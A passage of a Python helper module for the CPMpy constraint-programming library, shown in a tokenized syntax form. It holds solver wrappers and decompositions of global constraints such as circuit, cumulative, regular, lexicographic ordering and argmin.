ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper_opt model var_array print_solution=print_solution num_sols=1 num_procs=1<block_start>""" ortools_wrapper_opt((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the _optimal_ solution of a model. This tends to be (significantly) faster than using if model.solve(): # ... Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays(ss.varmap var_array print_solution 1)<line_sep># Flags to experiment with <if_stmt>num_procs<g>1<block_start>ss.ort_solver.parameters.num_search_workers=num_procs<block_end># ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep># Note: This is the real difference between this method and ortool_wrapper. # For optimal problems one cannot use SearchForAllSolutions. Instead # one must use ss.ort_solver.Solve(,) # ort_status = ss.ort_solver.SearchForAllSolutions(ss.ort_model, cb) ort_status=ss.ort_solver.Solve(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)# post-process after solve() call... print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper_count_solutions model var_array<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for just counting the solutions of a model. Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_simple_solution_counter(ss.varmap var_array)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)<line_sep><return>cb.solcount<block_end><def_stmt>base_array n<block_start>""" Returns an array of length `n` with base coefficients. Example: `base_array(4)` returns the array [1000,100,10,1] """<line_sep><return>np.array([10<power>i<for>i range(n-1 -1 -1)])<block_end><def_stmt>scalar_product a b<block_start>""" `scalar_product(a,b)` Returns the scalar product of the arrays `a` and `b`. Assumption: `len(a) == len(b)` """<assert_stmt>len(a)<eq>len(a) f"len(a) == len(b)"<line_sep># return np.dot(a,b) <return>sum(a<times>b)<block_end><def_stmt>scalar_product1 a<block_start>""" `scalar_product1(a)` Returns the scalar product of the array `a` and a base_array of appropriate length. Assumption: `len(a) == len(b)` """<assert_stmt>len(a)<eq>len(a) f"len(a) == len(b)"<line_sep># return np.dot(a,base_array(len(a))) <return>sum(a<times>base_array(len(a)))<block_end><def_stmt>my_circuit x<block_start>""" circuit(x) Exsures that x is a circuit. Note: This assumes that x is has the domain 0..len(x)-1, i.e. 0-based. """<assert_stmt>x[0].lb<eq>0 f"circuit: lb is {x[0].lb}, but must be 0"<line_sep>n=len(x)<line_sep>z=intvar(0 n-1 shape=n name='z')<line_sep>constraints=[AllDifferent(x) AllDifferent(z) # put the orbit of x[0] in in z[1..n] z[0]<eq>x[0] [z[i]<eq>x[z[i-1]]<for>i range(1 n-1)] # may not be 0 for i < n-1 [z[i]<ne>0<for>i range(1 n-1)] # when i = n-1 it must be 0 z[n-1]<eq>0]<line_sep><return>constraints<block_end><def_stmt>my_circuit_path x z<block_start>""" circuit(x,z) Ensures that x is an circuit and z is the path. Note: This assumes that x is has the domain 0..len(x)-1, i.e. 0-based. """<assert_stmt>x[0].lb<eq>0 f"circuit: x[0].lb is {x[0].lb}, but must be 0"<line_sep>n=len(x)<line_sep>constraints=[AllDifferent(x) AllDifferent(z) # put the orbit of x[0] in in z[1..n] z[0]<eq>x[0] [z[i]<eq>x[z[i-1]]<for>i range(1 n-1)] # may not be 0 for i < n-1 [z[i]<ne>0<for>i range(1 n-1)] # when i = n-1 it must be 0 z[n-1]<eq>0]<line_sep><return>constraints<block_end><def_stmt>count a val c<block_start>""" count(a,val,c) c is the number of occurrences of val in array a. """<line_sep><return>[c<eq>sum([a[i]<eq>val<for>i range(len(a))])]<block_end><def_stmt>atmost a val c<block_start>""" atmost(a,val,c) Ensure that the number of occurrences of val in a is atmost c. """<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<le>c]<block_end><def_stmt>atleast a val c<block_start>""" atleast(a,val,c) Ensure that the number of occurrences of val in a is atmost c. """<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<ge>c]<block_end><def_stmt>exactly a val c<block_start>""" exactly(a,val,c) Ensure that the number of occurrences of val in a is exactly c. """<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<eq>c]<block_end><def_stmt>global_cardinality_count a gcc<block_start>""" global_cardinality_count(a,gcc) Global cardinality count: Collect the number of occurrences of each value 0..a.ub in gcc. The array gcc must be of length 0..ub. """<line_sep>n=len(a)<line_sep>ub=max([a[i].ub<for>i range(n)])<line_sep>constraints=[]<for_stmt>i range(ub+1)<block_start>constraints<augadd>[count(a i gcc[i])]<block_end><return>constraints<block_end><def_stmt>inverse x y<block_start>""" inverse(x,y) Ensures that: x[i] == j #<=> y[j] == i Note: inverse(x,y) is sometimes called assignment(x,y). There is an alternative version: inverse(x) which can be simulated by inverse(x,x) """<line_sep>n=len(x)<assert_stmt>n<eq>len(y) "x and y must be of equal length"<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(n)<block_start>constraints<augadd>[(x[i]<eq>j)<eq>(y[j]<eq>i)]<block_end><block_end><return>constraints<block_end><def_stmt>my_cumulative s d r b<block_start>""" Decompositon of cumulative. Inspired by the MiniZinc implementation. The MiniZinc decomposition is discussed in the paper: <NAME>, <NAME>, <NAME>, and <NAME>. 'Why cumulative decomposition is not as bad as it sounds.' Parameters: s: start_times assumption: array of varint d: durations assumption: array of int r: resources assumption: array of int b: resource limit assumption: varint or int """<line_sep>constraints=[]<line_sep>max_d=max(d)<line_sep>tasks=[i<for>i range(len(s))<if>r[i]<g>0<and>d[i]<g>0]<line_sep>times_min=min([s[i].lb<for>i tasks])<line_sep>times_max=max([s[i].ub+max_d<for>i tasks])<for_stmt>t range(times_min times_max+1)<block_start>constraints<augadd>[b<ge>sum([((s[i]<le>t)&(t<l>s[i]+d[i]))<times>r[i]<for>i tasks])]<block_end># Somewhat experimental: # This constraint is needed to contrain the upper limit of b. <if_stmt><not>isinstance(b int)<block_start>constraints<augadd>[b<le>sum(r)]<block_end><return>constraints<block_end><def_stmt>member_of x val<block_start>""" member_of(x, val) Ensures that the value `val` is in the array `x`. """<line_sep>n=len(x)<line_sep># cc = intvar(0,n) # constraints = [count(x, val, cc), cc > 0] constraints=[sum([x[i]<eq>val<for>i range(n)])<g>0]<line_sep><return>constraints<block_end><def_stmt>regular x Q S d q0 F<block_start>""" Global constraint regular This is a translation of MiniZinc's regular constraint (defined in lib/zinc/globals.mzn), via the Comet code refered above. All comments are from the MiniZinc code. ''' The sequence of values in array 'x' (which must all be in the range 1..S) is accepted by the DFA of 'Q' states with input 1..S and transition function 'd' (which maps (1..Q, 1..S) -> 0..Q)) and initial state 'q0' (which must be in 1..Q) and accepting states 'F' (which all must be in 1..Q). We reserve state 0 to be an always failing state. ''' x : IntVar array Q : number of states S : input_max d : transition matrix q0: initial state F : accepting states Note: As mentioned above the states must start at 1 since 0 is represents a failed state. Note: Compare with regular_table which use the Table constraints instead of Element constraint in the main loop. """<assert_stmt>Q<g>0 'regular: "Q" must be greater than zero'<assert_stmt>S<g>0 'regular: "S" must be greater than zero'<line_sep># d2 is the same as d, except we add one extra transition for # each possible input; each extra transition is from state zero # to state zero. This allows us to continue even if we hit a # non-accepted input. d2=[]<for_stmt>i range(Q+1)<block_start>row=[]<for_stmt>j range(S)<block_start><if_stmt>i<eq>0<block_start>row.append(0)<block_end><else_stmt><block_start>row.append(d[i-1][j])<block_end><block_end>d2.append(row)<block_end>d2_flatten=[d2[i][j]<for>i range(Q+1)<for>j range(S)]<line_sep># If x has index set m..n, then a[m-1] holds the initial state # (q0), and a[i+1] holds the state we're in after processing # x[i]. If a[n] is in F, then we succeed (ie. accept the # string). x_range=list(range(0 len(x)))<line_sep>m=0<line_sep>n=len(x)<line_sep>a=[intvar(0 Q+1)<for>i range(m n+1)]<line_sep>constraints=[]<line_sep># Check that the final state is in F constraints<augadd>[member_of(F a[-1])]<line_sep># First state is q0 constraints<augadd>[a[m]<eq>q0]<for_stmt>i x_range<block_start>constraints<augadd>[x[i]<ge>1]<line_sep>constraints<augadd>[x[i]<le>S]<line_sep># Determine a[i+1]: a[i+1] == d2[a[i], x[i]] constraints<augadd>[a[i+1]<eq>Element(d2_flatten (a[i])<times>S+(x[i]-1))]<block_end><return>constraints<block_end><def_stmt>regular_table x Q S d q0 F<block_start>""" Global constraint regular_table This is a translation of MiniZinc's regular constraint (defined in lib/zinc/globals.mzn), via the Comet code refered above. All comments are from the MiniZinc code. ''' The sequence of values in array 'x' (which must all be in the range 1..S) is accepted by the DFA of 'Q' states with input 1..S and transition function 'd' (which maps (1..Q, 1..S) -> 0..Q)) and initial state 'q0' (which must be in 1..Q) and accepting states 'F' (which all must be in 1..Q). We reserve state 0 to be an always failing state. ''' x : IntVar array Q : number of states S : input_max d : transition matrix q0: initial state F : accepting states Note: As mentioned above the states must start at 1 since 0 is represents a failed state. The difference between this version (regular_table) and regular is that this version use Table constraint instead of Element constraint. """<assert_stmt>Q<g>0 'regular: "Q" must be greater than zero'<assert_stmt>S<g>0 'regular: "S" must be greater than zero'<line_sep># d2 is the same as d, except we add one extra transition for # each possible input; each extra transition is from state zero # to state zero. This allows us to continue even if we hit a # non-accepted input. d2=[]<for_stmt>i range(Q+1)<block_start>row=[]<for_stmt>j range(S)<block_start><if_stmt>i<eq>0# This is different from regular(.) <block_start>row.append((0 j 0))<block_end><else_stmt># This is different from regular(.) <block_start>row.append((i j d[i-1][j]))<block_end><block_end>d2.append(row)<block_end>d2_flatten=[d2[i][j]<for>i range(Q+1)<for>j range(S)]<line_sep># If x has index set m..n, then a[m-1] holds the initial state # (q0), and a[i+1] holds the state we're in after processing # x[i]. If a[n] is in F, then we succeed (ie. accept the # string). x_range=list(range(0 len(x)))<line_sep>m=0<line_sep>n=len(x)<line_sep>a=[intvar(0 Q+1)<for>i range(m n+1)]<line_sep>constraints=[]<line_sep># Check that the final state is in F constraints<augadd>[member_of(F a[-1])]<line_sep># First state is q0 constraints<augadd>[a[m]<eq>q0]<line_sep>x_lb,x_ub=get_min_max_domain(x)<for_stmt>i x_range<block_start>constraints<augadd>[x[i]<ge>1]<line_sep>constraints<augadd>[x[i]<le>S]<line_sep># Determine a[i+1]: a[i+1] == d2[a[i], x[i]] xi1=intvar(0 x_ub)<line_sep>constraints<augadd>[# These two constraints are different # from regular(.) xi1<eq>x[i]-1 Table((a[i] xi1 a[i+1]) d2_flatten)]<block_end><return>constraints<block_end><def_stmt>lex_less x y<block_start>""" lex_less(x,y) Ensures that the array 'x' is strictly lexicographically less than array 'y'. Compares them from first to last element, regardless of indices This is a port of MiniZinc's definition lex_less_int https://github.com/MiniZinc/libminizinc/blob/master/share/minizinc/std/fzn_lex_less_int.mzn Note that we simplify the calculation of lx and ly since cpmpy has start index 0 (in MiniZinc the start index can be user defined). """<line_sep>xlen=len(x)<line_sep>ylen=len(y)<line_sep>ux=xlen<line_sep>uy=ylen<line_sep>size=min([ux uy])<line_sep># Do not name variables in global constraints # since then the variables are not unique. # b = boolvar(shape=size+1,name="b") b=boolvar(shape=size+1)<line_sep>constraints=[]<line_sep>constraints<augadd>[b[0]<eq>1]<for_stmt>i range(size)<block_start>constraints<augadd>[b[i]<eq>((x[i]<le>y[i])&((x[i]<l>y[i])|(b[i+1]<eq>1)))]<block_end>constraints<augadd>[b[size]<eq>(ux<l>uy)]<line_sep><return>constraints<block_end><def_stmt>lex_greater x y<block_start>""" lex_greater(x,y) Ensures that the array 'x' is strictly lexicographically greater than array 'y'. Compares them from first to last element, regardless of indices. This constraint is defined by lex_less(y,x) defined above . """<line_sep><return>lex_less(y x)<block_end><def_stmt>lex2 x<block_start>""" lex2(x) Ensures that the rows and columns in the matrix `x` are increasing, using lex_less. """<line_sep>x_t=x.transpose()<line_sep><return>[[lex_less(x[i] x[i+1])<for>i range(len(x)-1)] [lex_less(x_t[i] x_t[i+1])<for>i range(len(x_t)-1)]]<block_end># # Somewhat general definition of knapsack. # <def_stmt>knapsack values weights n<block_start>""" knapsack(values, weights, n) Creates a model for the knapsack problem with the values, weights and limit n. See knapsack.py for usage of this. """<line_sep>z=intvar(0 10000 name="z")<line_sep>x=intvar(0 1 shape=len(values) name="x")<line_sep>model=Model([z<ge>0 z<eq>sum(x<times>values) sum(x<times>weights)<le>n ] maximize=z)<line_sep><return>[model x z]<block_end><def_stmt>my_abs x y d<block_start>""" A decomposition of abs() for experimentation. """<line_sep>constraints=[]<line_sep>b=boolvar()<line_sep>constraints<augadd>[b<eq>(x<ge>y)]<line_sep>constraints<augadd>[(b).implies(d<eq>x-y)]<line_sep>constraints<augadd>[(~b).implies(d<eq>y-x)]<line_sep><return>constraints<block_end><def_stmt>my_abs2 x y<block_start>""" A decomposition of abs() for experimentation. """<line_sep>constraints=[]<line_sep>b=boolvar()<line_sep>d=intvar(0 1000000)<line_sep>constraints<augadd>[b<eq>(x<ge>y)]<line_sep>constraints<augadd>[(b).implies(d<eq>x-y)]<line_sep>constraints<augadd>[(~b).implies(d<eq>y-x)]<line_sep><return>d<block_end><def_stmt>prod x res<block_start>""" prod(x,res) res is the product of the values in x. """<line_sep><return>[reduce(<lambda>a b:a<times>b x)<eq>res]<block_end><def_stmt>prod1 x<block_start>""" prod1(x) return the product of the values in x. """<line_sep><return>reduce(<lambda>a b:a<times>b x)<block_end><def_stmt>among m x v<block_start>""" among(m,x,v) Requires exactly m variables in x to take one of the values in v. """<line_sep><return>[m<eq>sum([x[i]<eq>j<for>i range(len(x))<for>j v])]<block_end># # Symmetry breaking # # From # http://en.wikipedia.org/wiki/Fr#C3#A9nicle_standard_form # """ # A magic square is in Frénicle standard form, named for # <NAME>, if the following two conditions apply: # - the element at position [1,1] (top left corner) is the smallest # of the four corner elements; and # - the element at position [1,2] (top edge, second from left) is # smaller than the element in [2,1]. # """ # <def_stmt>frenicle x n<block_start>constraints=[x[(0 0)]<eq>min([x[0 0] x[0 n-1] x[n-1 0] x[n-1 n-1]])]<line_sep>constraints<augadd>[x[0 1]<l>x[1 0]]<line_sep><return>constraints<block_end><def_stmt>distribute card value base<block_start>""" distribute(card, value, base) Requires that 'card[i]' is the number of occurences of 'value[i]' in 'base'. Note: card, value, and base are assumed to be intvar arrays. """<line_sep>card_len=len(card)<line_sep>value_len=len(value)<assert_stmt>card_len<eq>value_len "`card` and `value` must have the same length"<line_sep>base_len=len(base)<line_sep>constraints=[]<line_sep>constraints<augadd>[AllDifferent(value)]<for_stmt>i range(card_len)<block_start>constraints<augadd>[card[i]<eq>sum([value[i]<eq>base[j]<for>j range(base_len)])]<block_end><return>constraints<block_end><def_stmt>fill_array x x_val<block_start>""" fill_array(x,x_val) If x_val[i] != None then x[i] == x_val[i]. """<line_sep>constraints=[]<for_stmt>i range(len(x))<block_start><if_stmt>x_val[i]<ne><none><block_start>constraints<augadd>[x[i]<eq>x_val[i]]<block_end><block_end><return>constraints<block_end><def_stmt>all_different_pairs a s<block_start>""" all_different_pairs(a, s) all pairs must be different """<line_sep><return>[AllDifferent([p<for>p pairs(a s)])]<block_end><def_stmt>increasing_pairs a s<block_start>""" increasing_pairs(a, s) Ensure that the pairs are in increasing order. """<line_sep><return>[increasing(pairs(a s))]<block_end><def_stmt>decreasing_pairs a s<block_start>""" decreasing_pairs(a, s) Ensure that the pairs are in decreasing order. """<line_sep><return>[decreasing(pairs(a s))]<block_end><def_stmt>pairs a s<block_start>""" return the pairs of a in the 'integer representation': a[k,0]*(n-1) + a[k,1] s is the size of max value of n """<line_sep>n=len(a)<line_sep><return>[a[(k 0)]<times>(s-1)+a[(k 1)]<for>k range(n)]<block_end><def_stmt>all_min_dist min_dist x n<block_start>""" all_min_dist(min_dist, x, n) Ensures that the differences of all pairs (i !=j) are >= min_dist. """<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(i)<block_start>constraints<augadd>[abs(x[i]-x[j])<ge>min_dist]<block_end><block_end># Nope! <return>constraints<block_end><def_stmt>all_different_on_intersection x y<block_start>""" all_different_on_intersection(x, y) Ensure that the values that are common in x and y are distinct (in each array). """<line_sep><return>[count_a_in_b(x y) count_a_in_b(y x)]<block_end><def_stmt>count_a_in_b ass bss<block_start>""" count_a_in_b(ass,bss) helper for all_different_on_intersection """<line_sep>constraints=[]<for_stmt>a ass<block_start>constraints<augadd>[sum([a<eq>b<for>b bss])<le>1]<block_end><return>constraints<block_end><def_stmt>all_different_modulo x m<block_start>""" all_different_modulo(x, m) Ensure that all elements in x (modulo m) are distinct """<line_sep>print("x2:" x)<line_sep>n=len(x)<line_sep>constraints=[]<line_sep>mods=intvar(0 m-1 shape=n)<for_stmt>i range(n)<block_start>constraints<augadd>[mods[i]<eq>x[i]%m]<block_end>constraints<augadd>[AllDifferent(mods)]<line_sep><return>constraints<block_end><def_stmt>all_different_cst xs cst<block_start>""" all_different_cst(xs, cst) Ensure that all elements in xs + cst are distinct """<line_sep><return>[AllDifferent([(x+c)<for>(x c) zip(xs cst)])]<block_end><def_stmt>arith x relop val<block_start>""" arith(x, relop, val) Ensure that all elements in x are <relop> val. """<line_sep>constraints=[]<for_stmt>i range(len(x))<block_start>constraints<augadd>[arith_relop(x[i] relop val)]<block_end><return>constraints<block_end><def_stmt>arith_relop a t b<block_start>""" arith_relop(a, t, b) This is (arguably) a hack. Represents each function as an integer 0..5. """<line_sep><return>[(t<eq>0).implies(a<l>b) (t<eq>1).implies(a<le>b) (t<eq>2).implies(a<eq>b) (t<eq>3).implies(a<ge>b) (t<eq>4).implies(a<g>b) (t<eq>5).implies(a<ne>b)]<block_end># # diffn ported from MiniZinc's fzn_diffn: # <def_stmt>diffn x y dx dy<block_start>""" diffn(x,y,dx,dy) Constrains rectangles i, given by their origins x[i], y[i]) and sizes (dx[i], dy[i]), to be non-overlapping. Zero-width rectangles can still not overlap with any other rectangle. """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(i+1 n)<block_start>constraints<augadd>[(x[i]+dx[i]<le>x[j])|(y[i]+dy[i]<le>y[j])|(x[j]+dx[j]<le>x[i])|(y[j]+dy[j]<le>y[i])]<block_end><block_end><return>constraints<block_end><def_stmt>nvalue m x<block_start>""" nvalue(m, x) Requires that there is exactly m distinct values in x (min_val and max_val are the minimum and maximum value in x, respectively) """<line_sep>n=len(x)<line_sep>min_val=min([x[i].lb<for>i range(n)])<line_sep>max_val=max([x[i].ub<for>i range(n)])<line_sep><return>(m<eq>sum([sum([x[j]<eq>i<for>j range(n)])<g>0<for>i range(min_val max_val+1)]))<block_end># # nvalues(x,op,n) # # Requires that the number of distinct values in the array x is # op n # where # op is either one of # =, <m, =<, >=, > # <def_stmt>nvalues x op n<block_start>xlen=len(x)<line_sep>m=intvar(1 xlen)<line_sep><return>[nvalue(m x) arith_relop(m op n)]<block_end><def_stmt>clique g clique card<block_start>""" clique(g, clique, card) Ensure that the boolean array 'clique' (of Integer Array type) represents a clique in the graph g with the cardinality card. Note: This is kind of backward, but it is the whole thing: If there is a connection between nodes I and J (I != J) then there should be a node from I to J in G. If it's not then both c1 and c2 is not in the clique. """<line_sep>n=len(g)<line_sep>constraints=[]<line_sep>constraints<augadd>[card<eq>sum([clique[i]<for>i range(n)])]<for_stmt>(c1 i) zip(clique range(n))<block_start><for_stmt>(c2 j) zip(clique range(n))<block_start><if_stmt>i<ne>j<and>g[i][j]<eq>0<block_start>constraints<augadd>[(c1<eq>0)|(c2<eq>0)]<block_end><block_end><block_end><return>constraints<block_end><def_stmt>assignment_model cost tasks=<none> people=<none> print_solution=<none> opt="min"<block_start>""" assignment_model(cost, rows, cols, tasks=None,people=None,print_solution=None,opt='min'): Fairly general implementation of the assignment problem: Minimize total cost of assign all task to one person given the cost of assigning a person to the tasks. For problems were 'task' and 'people' does not applies, a used-defined method 'print_solution' can be used. For maximization problems, use opt='max'. """<line_sep>rows=len(cost)<line_sep>cols=len(cost[0])<line_sep>max_cost=np.sum(np.array(cost))<line_sep>total_cost=intvar(0 max_cost name='cost')<line_sep>x=boolvar(shape=(rows cols) name="x")<line_sep>model=Model(total_cost<ge>0 total_cost<eq>np.sum([x_row<times>cost_row<for>(x_row cost_row) zip(x cost)]) # exacly one assignment per row, all rows (tasks) must be assigned. [sum(row)<eq>1<for>row x] # zero or one assignments per column (people) [sum(col)<le>1<for>col x.transpose()] )<if_stmt>opt<eq>"max"<block_start>model.maximize(total_cost)<block_end><else_stmt><block_start>model.minimize(total_cost)<block_end>ss=CPM_ortools(model)<if_stmt>ss.solve()<block_start>print("total_cost: " total_cost.value())<line_sep>print("x:")<line_sep>print(x.value())<line_sep>print()<if_stmt>tasks<eq><none><and>people<eq><none><block_start><for_stmt>i range(rows)<block_start>print("Task" i end="")<for_stmt>j range(cols)<block_start><if_stmt>x[i][j].value()<eq>1<block_start>print(" is done by " j)<block_end><block_end><block_end>print()<block_end><else_stmt><block_start><if_stmt>print_solution<ne><none><block_start>print_solution(x.value() tasks people)<block_end><else_stmt><block_start><for_stmt>i range(rows)<block_start>print("Task" tasks[i] end="")<for_stmt>j range(cols)<block_start><if_stmt>x[i][j].value()<eq>1<block_start>print(" is done by" people[j])<block_end><block_end><block_end>print()<block_end><block_end><block_end><block_end><def_stmt>latin_square x<block_start>""" latin_square(x) The matrix x is a Latin square. """<line_sep><return>[[AllDifferent(row)<for>row x] [AllDifferent(col)<for>col x.transpose()]]<block_end># # reverses an array from -> to # <def_stmt>reverse xfrom xto<block_start>""" reverse(xfrom, xto) xto is reverse of xfrom. """<line_sep>n=len(xfrom)<line_sep><return>[xto[i]<eq>xfrom[n-i-1]<for>i range(n)]<block_end><def_stmt>print_model_and_variables model<block_start>""" print_model_and_variables(model) Prints the following: - the unflattened model (via print(model)) - the flattened model - the variables and the domains in the flattened model (From <NAME> when he debugged one of my models. Thanks, Tias!) """<line_sep>print("Model:")<line_sep>print(model)<line_sep>print("\nFlattened model and variables:")<line_sep>mf=flatten_model(model)<line_sep>print_variables(mf)<line_sep>print(mf)<line_sep>print()<block_end><def_stmt>argmax x p<block_start>""" argmax(x,p) Ensure that p is the argmax, i.e. the position of the maximum value in x. Note: If there are many maximum values then argmax(x,p) will find all these values. """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies(x[p]<g>x[i])]<block_end><return>constraints<block_end><def_stmt>argmin x p<block_start>""" argmin(x,p) Ensure that p is the argmin, i.e. the position of the minimum value in x. Note: If there are many minimum values then argmin(x,p) will find all these values. """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies(x[p]<l>x[i])]<block_end><return>constraints<block_end><def_stmt>argmin_except_c x p c<block_start>""" argmin_except_c(x,p,c) Ensure that p is the argmin, i.e. the position of the minimum value in x, but ignores any value of c. Note: - If there are many minimum values then argmin_except_c(x,p,c) will find all these values. - We assume that there are at least one value != c. """<line_sep>n=len(x)<line_sep>constraints=[x[p]<ne>c]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies((x[i]<eq>c)|(x[p]<l>x[i]))]<block_end><return>constraints<block_end><def_stmt>argmin_except_0 x p<block_start>""" argmin_except_0(x,p) Ensure that p is the argmin, i.e. the position of the minimum value in x, but ignores any value of 0. Note: - If there are many minimum values then argmin_except_0(x,p) will find all these values. - We assume that there are at least one value > 0. """<line_sep><return>argmin_except_c(x p 0)<block_end><def_stmt>argmax_except_c x p c<block_start>""" argmax_except_c(x,p,c) Ensure that p is the argmax, i.e. the position of the minimum value in x, but ignores any value of c. Note: - If there are many maximum values then argmax_except_c(x,p,c) will find all these values. - We assume that there are at least one value != c. """<line_sep>n=len(x)<line_sep>constraints=[x[p]<ne>c]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies((x[i]<eq>c)|(x[p]<g>x[i]))]<block_end><return>constraints<block_end><def_stmt>permutation3 x p y<block_start>""" permutation(x,p,y) Ensure that the array y is a permutation of array x with the permutation operations in array p. Example: x = [2,0,1,3] p = [2,1,3,0] What is y? y[0] = x[p[0]] = x[2] = 1 y[1] = x[p[1]] = x[1] = 0 y[2] = x[p[2]] = x[3] = 3 y[3] = x[p[3]] = x[0] = 2 Thus: y = [1,0,3,2] Assumptions: - We assume that x, p, and y has distinct values, i.e. constrained by AllDifferent. We check that: - p has the domain of 0..len(p)-1 """<line_sep>n=len(x)<assert_stmt>n<eq>len(p)<and>n<eq>len(y) f"Length of x, p, and y must be the same"<line_sep>p_lb,p_ub=get_min_max_domain(p)<assert_stmt>p_lb<eq>0<and>p_ub<eq>n-1 "Domain value of p must be 0..n-1"<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[y[i]<eq>x[p[i]]]<block_end><return>constraints<block_end><def_stmt>permutation x y<block_start>""" permutation(x,y) Ensure that the array y is a permutation of array x, connected with some unknown permutation. permutation3(x,p,y) is used (which see). """<line_sep>n=len(x)<line_sep>p=intvar(0 n-1 shape=n)<line_sep><return>permutation3(x p y)<block_end><def_stmt>get_min_max_domain x<block_start>""" get_min_max_domain(x) Return the minimum and maximum domain of an array x. """<line_sep>n=len(x)<line_sep>x_lb=min([x[i].lb<for>i range(n)])<line_sep>x_ub=max([x[i].ub<for>i range(n)])<line_sep><return>[x_lb x_ub]<block_end><def_stmt>chain op x<block_start>""" chain(op,x) Ensure that all elements pairwise satisfies the binary operator op. Note: In order for this to work the operator must be from the operator library, e.g. operator.lt, operator.ne, e.g: chain(operator.lt,x) Note: Many of the binary operator.* has a definition already, e.g. (from cpmpy_hakank.py): increasing, increasing_strict, decreasing, descreasing_strict and AllDifferent, AllEqual """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[op(x[i-1] x[i])]<block_end><return>constraints<block_end><def_stmt>minimum_except_c x min_val c allow_all_c=<false><block_start>""" minimum_except_c(x,min_val,c,allow_all_c) Ensures that min_val is the minimum value in array x, ignoring the value of c. The flag allow_all_c: - If True: allow an array with only c values: min_val is thus c. - If False: assume that there is at least one non c value. min_val must be != c. """<line_sep>n=len(x)<line_sep>ix=intvar(0 n-1)<line_sep># Ensure that min_val is in x constraints=[min_val<eq>x[ix]]<for_stmt>j range(n)<block_start>constraints<augadd>[(min_val<le>x[j])|(x[j]<eq>0)]<block_end><if_stmt>allow_all_c<block_start>max_val=max(x)# To be able to handle the case when there is only 0s constraints<augadd>[(max_val<eq>c)<eq>(min_val<eq>c)]<block_end><else_stmt><block_start>constraints<augadd>[min_val<ne>c]<block_end><return>constraints<block_end><def_stmt>minimum_except_0 x min_val allow_all_0s=<false><block_start>""" minimum_except_0(x,min_val,allow_all_0s) Ensures that min_val is the minimum value in array x, ignoring 0s. The flag allow_all_0s: - If True: allow an array with only 0 values: min_val is thus 0. - If False: assume that there is at least one non 0 value. min_val must be != 0. """<line_sep><return>minimum_except_c(x min_val 0 <false>)<block_end><def_stmt>value_precede s t x<block_start>""" value_precede(s,t, x) Ensures that the (first occurrence) of the value s precedes the (first occurrence) of the value t in array x if both s and t are in x. This means that for t to occur in x then s has to precede t. This definition is inspired by MiniZinc's definition value_precede.mzn """<line_sep>n=len(x)<line_sep>bs=boolvar(shape=n+1)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>xis=boolvar()<line_sep>constraints<augadd>[(xis<eq>1)<eq>(x[i]<eq>s) (xis<eq>1).implies(bs[i+1]<eq>1) (xis<eq>0).implies(bs[i]<eq>bs[i+1]) (bs[i]<eq>0).implies(x[i]<ne>t)]<block_end>constraints<augadd>[bs[0]<eq>0]<line_sep><return>constraints<block_end><def_stmt>value_precede_chain c x<block_start>""" value_precede_chain(c, x) Ensures that the value c[i-1] precedes the value c[i] is the array x if both c[i-1] and c[i] are in x. See value_precede(). """<line_sep>n=len(c)<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[value_precede(c[i-1] c[i] x)]<block_end><return>constraints<block_end><def_stmt>sliding_sum low up seq x<block_start>""" sliding_sum(low, up, seq, x) Ensure that all sequences of length seq in x sums to between low and up. """<line_sep>vlen=len(x)<line_sep>constraints=[]<for_stmt>i range(vlen-seq+1)<block_start>s=intvar(low up)<line_sep>constraints<augadd>[s<eq>sum([x[j]<for>j range(i i+seq)])]<block_end><return>constraints<block_end><def_stmt>no_overlap s1 d1 s2 d2<block_start>""" no_overlap(s1, d1, s2, d2) Ensures that task 1 (start time s1 with duration d1) does not overlap with task2 (start time s2 with duration d2) """<line_sep><return>[(s1+d1<le>s2)|(s2+d2<le>s1)]<block_end><def_stmt>is_prime n<block_start>""" is_prime(n) Returns True if the number n is a prime number, otherwise return False. 